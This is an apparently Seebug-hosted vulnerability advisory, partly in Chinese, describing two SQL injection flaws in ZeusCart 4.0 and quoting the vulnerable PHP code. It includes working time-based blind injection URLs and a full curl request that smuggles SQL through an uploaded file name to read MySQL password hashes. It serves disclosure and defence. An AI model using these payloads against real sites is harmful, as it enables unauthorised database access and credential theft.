ZeusCart v4.0 /classes/Core/CFeaturedItems.php SQL注入

2015-09-19T00:00:00
ID SSV:89481
Type seebug
Reporter F001
Modified 2015-09-19T00:00:00

Description

<p>ZeusCart 4.0: SQL Injection</p><p>1.漏洞描述</p><p>在ZeusCart4.0中存在两个注入漏洞,一个注入不需要任何条件即可exploit,另一个是是发生在admin后台的注入。</p><p>因为大部分参数都是依赖于简单的过滤,所以很容易由于过滤不全而产生漏洞。</p><p>2a. Timing based Blind SQL Injection 基于时间的盲注</p><p>证明:</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)</p><p>-> true</p><p> </p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)</p><p>-> false</p><p>payload中不可以使用引号,引号已经被过滤掉。</p><p>通过盲注get mysql密码</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1</a></p><p>AND IF(ascii(substring((SELECT password from mysql.user limit</p><p>0,1),1,1))=42,BENCHMARK(500000000,version()),null)</p><p>-> true, password hash starts with *</p><p> </p><p>发生漏洞位于/classes/Core/CFeaturedItems.php文件中的$maincatid参数注入。</p><p>Code</p><p>        /classes/Core/CFeaturedItems.php:52</p><p>                $maincatid = $_GET['maincatid'];//这里很明显没有进行进一步的过滤</p><p>        [...]</p><p>                $sql = "SELECT DISTINCT a.category_name AS</p><p>Category,a.category_id AS maincatid, b.category_name AS SubCategory,</p><p>b.category_id as subcatid, b.category_image AS image FROM category_table</p><p>a INNER JOIN category_table b ON a.category_id = b.category_parent_id</p><p>WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";</p><p> </p><p>2b. 在后台发生的注入(需要admin权限)</p><p> </p><p>所有的GET,POST,REQUEST参数都经过filter_var函数进行过滤用来防御sql注入和xss</p><p>但是对于大部分查询,没有进行更加深入详细的过滤。</p><p> </p><p>    Log in as admin</p><p>    Create a new product, using a file name for ufile[0] like:</p><p>"image.jpgblla', description=(SELECT password FROM mysql.user limit</p><p>0,1), image='test</p><p>    Visiting</p><p><a href="http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID" rel="nofollow">http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID</a></p><p>will give the result of the injected query.</p><p> </p><p>Curl command to create a new product:</p><p> </p><p>curl -i -s -k  -X 'POST' \</p><p>    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0)</p><p>Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type:</p><p>multipart/form-data; boundary=--------2025782171' \</p><p>    -b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \</p><p>    --data-binary $'----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose</p><p>Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\',</p><p>description=(SELECT password FROM mysql.user limit 0,1),</p><p>image=\'test\"\x0d\x0aContent-Type:</p><p>image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \</p><p> </p><p>'<a href="http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert" rel="nofollow">http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert</a>'</p><p>Code</p><p> </p><p> </p><p>        CProductEntry.php:313</p><p>                            $imgfilename= $_FILES['ufile']['name'][$i];</p><p> </p><p>                            $imagefilename =</p><p>date("Y-m-d-His").$imgfilename ; // generate a new name:  2015-9-18image.jpgblla</p><p> </p><p>                            $image="images/products/". $imagefilename;</p><p>// updated into DB</p><p>        [...]</p><p> </p><p>                            if($i==0)</p><p>                            {</p><p>                                $imgType='main';</p><p>                                $update="UPDATE products_table set</p><p>image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where</p><p>product_id='".$product_id."'";</p><p>                                $obj->updateQuery($update);</p><p>                            }</p><p>                            else</p><p>                            {</p><p>                                $imgType='sub';</p><p>                            }</p><p> </p><p>                                if($_FILES['ufile']['name'][$i]!='')</p><p>                                {</p><p>                                    $query_img="INSERT INTO</p><p>product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)</p><p>VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";</p><p> </p><p>                                    $obj_img=new Bin_Query();</p><p> </p><p>                                    $obj_img->updateQuery($query_img);</p><p>                                }</p><p> </p><p> </p><p>                        }</p><p> </p>